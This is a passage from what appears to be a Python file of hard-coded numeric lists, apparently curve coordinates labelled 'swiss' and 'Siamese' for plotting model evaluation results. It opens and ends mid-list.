0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1] x1_swiss, y1_swiss = [0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.003194888178913738, 0.012779552715654952, 0.012779552715654952, 0.012779552715654952, 0.012779552715654952, 0.012779552715654952, 0.012779552715654952, 0.012779552715654952, 0.012779552715654952, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.019169329073482427, 0.019169329073482427, 0.019169329073482427, 0.022364217252396165, 0.022364217252396165, 0.022364217252396165, 0.022364217252396165, 0.022364217252396165, 0.02875399361022364, 0.03194888178913738, 0.03194888178913738, 0.03194888178913738, 0.038338658146964855, 0.038338658146964855, 0.04153354632587859, 0.04792332268370607, 0.04792332268370607, 0.04792332268370607, 0.04792332268370607, 0.04792332268370607, 0.051118210862619806, 0.051118210862619806, 0.051118210862619806, 0.051118210862619806, 0.054313099041533544, 0.054313099041533544, 0.06389776357827476, 0.06389776357827476, 0.06389776357827476, 0.06389776357827476, 0.06389776357827476, 0.06389776357827476, 0.07028753993610223, 0.07028753993610223, 0.07348242811501597, 0.07348242811501597, 0.07667731629392971, 0.07987220447284345, 0.08306709265175719, 0.08306709265175719, 0.08306709265175719, 0.08306709265175719, 0.08306709265175719, 0.08945686900958466, 0.0926517571884984, 0.10223642172523961, 0.10223642172523961, 0.10223642172523961, 0.10862619808306709, 0.11182108626198083, 0.1182108626198083, 0.12140575079872204, 0.12140575079872204, 0.12140575079872204, 0.12140575079872204, 0.12460063897763578, 0.12460063897763578, 0.12779552715654952, 0.13738019169329074, 0.13738019169329074, 0.14376996805111822, 0.15654952076677317, 0.16613418530351437, 0.16613418530351437, 0.1757188498402556, 0.17891373801916932, 0.18210862619808307, 0.19169329073482427, 0.19169329073482427, 0.19808306709265175, 0.19808306709265175, 0.2012779552715655, 0.20766773162939298, 0.2108626198083067, 0.2108626198083067, 0.2108626198083067, 0.22044728434504793, 0.2268370607028754, 0.2364217252396166, 0.2364217252396166, 0.24281150159744408, 0.24600638977635783, 0.24600638977635783, 0.24600638977635783, 0.24600638977635783, 0.25559105431309903, 0.2715654952076677, 0.2779552715654952, 0.28434504792332266, 0.29073482428115016, 0.2939297124600639, 0.3003194888178914, 0.30670926517571884, 0.3226837060702875, 0.33226837060702874, 0.3450479233226837, 0.34824281150159747, 0.3514376996805112, 0.36421725239616615, 0.3706070287539936, 0.3706070287539936, 0.3738019169329074, 0.38338658146964855, 0.38977635782747605, 0.41214057507987223, 0.4217252396166134, 0.4281150159744409, 0.43450479233226835, 0.4440894568690096, 0.4440894568690096, 0.4504792332268371, 0.46325878594249204, 0.476038338658147, 0.48562300319488816, 0.48562300319488816, 0.49201277955271566, 0.49201277955271566, 0.4952076677316294, 0.5015974440894568, 0.5047923322683706, 0.5111821086261981, 0.5143769968051118, 0.5175718849840255, 0.5207667731629393, 0.5271565495207667, 0.5271565495207667, 0.5271565495207667, 0.5303514376996805, 0.5303514376996805, 0.5335463258785943, 0.5335463258785943, 0.536741214057508, 0.5431309904153354, 0.549520766773163, 0.5527156549520766, 0.5654952076677316, 0.5686900958466453, 0.5718849840255591, 0.5782747603833865, 0.5942492012779552, 0.6006389776357828, 0.6038338658146964, 0.6070287539936102, 0.6134185303514377, 0.6166134185303515, 0.6198083067092651, 0.6261980830670927, 0.6325878594249201, 0.6357827476038339, 0.6421725239616614, 0.645367412140575, 0.65814696485623, 0.6645367412140575, 0.670926517571885, 0.6741214057507987, 0.6837060702875399, 0.6869009584664537, 0.6932907348242812, 0.6964856230031949, 0.6996805111821086, 0.6996805111821086, 0.6996805111821086, 0.7028753993610224, 0.7092651757188498, 0.7156549520766773, 0.7156549520766773, 0.7220447284345048, 0.7252396166134185, 0.7348242811501597, 0.7348242811501597, 0.7348242811501597, 0.744408945686901, 0.7507987220447284, 0.7507987220447284, 0.7571884984025559, 0.7603833865814696, 0.7603833865814696, 0.7603833865814696, 0.7635782747603834, 0.7635782747603834, 0.7667731629392971, 0.7667731629392971, 0.7763578274760383, 0.7763578274760383, 0.7827476038338658, 0.7859424920127795, 0.7859424920127795, 0.792332268370607, 0.7955271565495208, 0.805111821086262, 0.8083067092651757, 0.8178913738019169, 0.8210862619808307, 0.8210862619808307, 0.8274760383386581, 0.8306709265175719, 0.8338658146964856, 0.8370607028753994, 0.8402555910543131, 0.8402555910543131, 0.8434504792332268, 0.8466453674121406, 0.8562300319488818, 0.8562300319488818, 0.8594249201277955, 0.8626198083067093, 0.8626198083067093, 0.865814696485623, 0.8690095846645367, 0.8722044728434505, 0.8753993610223643, 0.8753993610223643, 0.8753993610223643, 0.8753993610223643, 0.8785942492012779, 0.8785942492012779, 0.8785942492012779, 0.8785942492012779, 0.8785942492012779, 0.8785942492012779, 0.8849840255591054, 0.8849840255591054, 0.8849840255591054, 0.8881789137380192, 0.8881789137380192, 0.8945686900958466, 0.8977635782747604, 0.9009584664536742, 0.9041533546325878, 0.9041533546325878, 0.9041533546325878, 0.9073482428115016, 0.9073482428115016, 0.9105431309904153, 0.9105431309904153, 0.9137380191693291, 0.9137380191693291, 0.9137380191693291, 0.9137380191693291, 0.9169329073482428, 0.9169329073482428, 0.9201277955271565, 0.9201277955271565, 0.9233226837060703, 0.9233226837060703, 0.9233226837060703, 0.9233226837060703, 0.9233226837060703, 0.9233226837060703, 0.9233226837060703, 0.9297124600638977, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9361022364217252, 0.9361022364217252, 0.939297124600639, 0.939297124600639, 0.939297124600639, 0.9456869009584664, 0.9488817891373802, 0.9488817891373802, 0.9488817891373802, 0.952076677316294, 0.952076677316294, 0.952076677316294, 0.9552715654952076, 0.9552715654952076, 0.9552715654952076, 0.9552715654952076, 0.9584664536741214, 0.9648562300319489, 0.9648562300319489, 0.9712460063897763, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9776357827476039, 0.9808306709265175, 0.9808306709265175, 0.9840255591054313, 0.9840255591054313, 0.9840255591054313, 0.9840255591054313, 0.9904153354632588, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 1] , [0, 0.0, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.006389776357827476, 0.006389776357827476, 0.006389776357827476, 0.006389776357827476, 0.006389776357827476, 0.009584664536741214, 0.009584664536741214, 0.012779552715654952, 0.019169329073482427, 0.022364217252396165, 0.02875399361022364, 0.02875399361022364, 0.02875399361022364, 0.02875399361022364, 0.03194888178913738, 0.03194888178913738, 0.03194888178913738, 0.03514376996805112, 0.038338658146964855, 0.04153354632587859, 0.04153354632587859, 0.04792332268370607, 0.051118210862619806, 0.054313099041533544, 0.05750798722044728, 0.06389776357827476, 0.07348242811501597, 0.07667731629392971, 0.08626198083067092, 0.0926517571884984, 0.09904153354632587, 0.10862619808306709, 0.10862619808306709, 0.11182108626198083, 0.1182108626198083, 0.12460063897763578, 0.12779552715654952, 0.14057507987220447, 0.14376996805111822, 0.14696485623003194, 0.16293929712460065, 0.16613418530351437, 0.16932907348242812, 0.1757188498402556, 0.17891373801916932, 0.1853035143769968, 0.19488817891373802, 0.19808306709265175, 0.20766773162939298, 0.22044728434504793, 0.2268370607028754, 0.23003194888178913, 0.2364217252396166, 0.24600638977635783, 0.24920127795527156, 0.25559105431309903, 0.26198083067092653, 0.26198083067092653, 0.26517571884984026, 0.268370607028754, 0.2715654952076677, 0.2715654952076677, 0.2747603833865815, 0.2779552715654952, 0.28115015974440893, 0.28434504792332266, 0.2939297124600639, 0.2971246006389776, 0.3003194888178914, 0.3035143769968051, 0.30670926517571884, 0.30990415335463256, 0.30990415335463256, 0.31629392971246006, 0.329073482428115, 0.3354632587859425, 0.33865814696485624, 0.33865814696485624, 0.34185303514376997, 0.3450479233226837, 0.3514376996805112, 0.3610223642172524, 0.3706070287539936, 0.3738019169329074, 0.3769968051118211, 0.3801916932907348, 0.3801916932907348, 0.38338658146964855, 0.38977635782747605, 0.3929712460063898, 0.3961661341853035, 0.3993610223642173, 0.3993610223642173, 0.4057507987220447, 0.41214057507987223, 0.41533546325878595, 0.4217252396166134, 0.43130990415335463, 0.43130990415335463, 0.43130990415335463, 0.43769968051118213, 0.44089456869009586, 0.4440894568690096, 0.4472843450479233, 0.4472843450479233, 0.4504792332268371, 0.45686900958466453, 0.46645367412140576, 0.46645367412140576, 0.476038338658147, 0.476038338658147, 0.48242811501597443, 0.48562300319488816, 0.48881789137380194, 0.48881789137380194, 0.4984025559105431, 0.5047923322683706, 0.5079872204472844, 0.5111821086261981, 0.5111821086261981, 0.5111821086261981, 0.5175718849840255, 0.5175718849840255, 0.5271565495207667, 0.5335463258785943, 0.5399361022364217, 0.5431309904153354, 0.5431309904153354, 0.5431309904153354, 0.5463258785942492, 0.5463258785942492, 0.5527156549520766, 0.5559105431309904, 0.5591054313099042, 0.5591054313099042, 0.5623003194888179, 0.5654952076677316, 0.5654952076677316, 0.5718849840255591, 0.5718849840255591, 0.5750798722044729, 0.5750798722044729, 0.5782747603833865, 0.5814696485623003, 0.5814696485623003, 0.5878594249201278, 0.5878594249201278, 0.5910543130990416, 0.5942492012779552, 0.5942492012779552, 0.6070287539936102, 0.610223642172524, 0.6134185303514377, 0.6230031948881789, 0.6261980830670927, 0.6261980830670927, 0.6261980830670927, 0.6389776357827476, 0.6389776357827476, 0.6389776357827476, 0.645367412140575, 0.6485623003194888, 0.6613418530351438, 0.6613418530351438, 0.6645367412140575, 0.6645367412140575, 0.6677316293929713, 0.6741214057507987, 0.6741214057507987, 0.6773162939297125, 0.6773162939297125, 0.6805111821086262, 0.6805111821086262, 0.6837060702875399, 0.6869009584664537, 0.6869009584664537, 0.6869009584664537, 0.6900958466453674, 0.6932907348242812, 0.6996805111821086, 0.7028753993610224, 0.7028753993610224, 0.7060702875399361, 0.7092651757188498, 0.7156549520766773, 0.7156549520766773, 0.7156549520766773, 0.7188498402555911, 0.7284345047923323, 0.7284345047923323, 0.731629392971246, 0.731629392971246, 0.731629392971246, 0.7348242811501597, 0.7380191693290735, 0.7380191693290735, 0.7380191693290735, 0.7412140575079872, 0.744408945686901, 0.744408945686901, 0.7507987220447284, 0.7571884984025559, 0.7603833865814696, 0.7603833865814696, 0.7635782747603834, 0.7699680511182109, 0.7731629392971247, 0.7731629392971247, 0.7731629392971247, 0.7795527156549521, 0.7795527156549521, 0.7795527156549521, 0.7859424920127795, 0.7859424920127795, 0.7859424920127795, 0.7859424920127795, 0.7955271565495208, 0.7955271565495208, 0.7955271565495208, 0.7987220447284346, 0.8019169329073482, 0.8019169329073482, 0.8019169329073482, 0.8019169329073482, 0.8083067092651757, 0.8115015974440895, 0.8115015974440895, 0.8115015974440895, 0.8115015974440895, 0.8178913738019169, 0.8210862619808307, 0.8274760383386581, 0.8306709265175719, 0.8306709265175719, 0.8306709265175719, 0.8338658146964856, 0.8370607028753994, 0.8402555910543131, 0.8434504792332268, 0.8434504792332268, 0.8466453674121406, 0.8466453674121406, 0.8466453674121406, 0.853035143769968, 0.853035143769968, 0.8562300319488818, 0.8562300319488818, 0.8594249201277955, 0.8626198083067093, 0.8690095846645367, 0.8753993610223643, 0.8753993610223643, 0.8753993610223643, 0.8785942492012779, 0.8817891373801917, 0.8817891373801917, 0.8913738019169329, 0.8945686900958466, 0.8945686900958466, 0.8945686900958466, 0.8945686900958466, 0.8945686900958466, 0.8945686900958466, 0.9009584664536742, 0.9041533546325878, 0.9041533546325878, 0.9041533546325878, 0.9041533546325878, 0.9041533546325878, 0.9041533546325878, 0.9073482428115016, 0.9073482428115016, 0.9105431309904153, 0.9137380191693291, 0.9137380191693291, 0.9137380191693291, 0.9137380191693291, 0.9169329073482428, 0.9201277955271565, 0.9201277955271565, 0.9233226837060703, 0.9265175718849841, 0.9265175718849841, 0.9265175718849841, 0.9265175718849841, 0.9265175718849841, 0.9265175718849841, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9361022364217252, 0.9424920127795527, 0.9456869009584664, 0.9456869009584664, 0.9456869009584664, 0.952076677316294, 0.952076677316294, 0.9552715654952076, 0.9552715654952076, 0.9584664536741214, 0.9584664536741214, 0.9584664536741214, 0.9584664536741214, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9680511182108626, 0.9680511182108626, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9776357827476039, 0.9776357827476039, 0.9776357827476039, 0.9776357827476039, 0.9776357827476039, 0.9776357827476039, 0.9776357827476039, 0.9776357827476039, 0.9776357827476039, 0.9808306709265175, 0.9840255591054313, 0.987220447284345, 0.987220447284345, 0.987220447284345, 0.9904153354632588, 0.9904153354632588, 0.9904153354632588, 0.9904153354632588, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1] # Siamese from x2, y2 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.0625, 0.0625, 0.0625, 0.0625, 0.0625, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.10416666666666667, 0.10416666666666667, 0.10416666666666667, 0.10416666666666667, 0.10416666666666667, 0.10416666666666667, 0.10416666666666667, 0.10416666666666667, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.20833333333333334, 0.20833333333333334, 0.20833333333333334, 0.20833333333333334, 0.20833333333333334, 0.20833333333333334, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 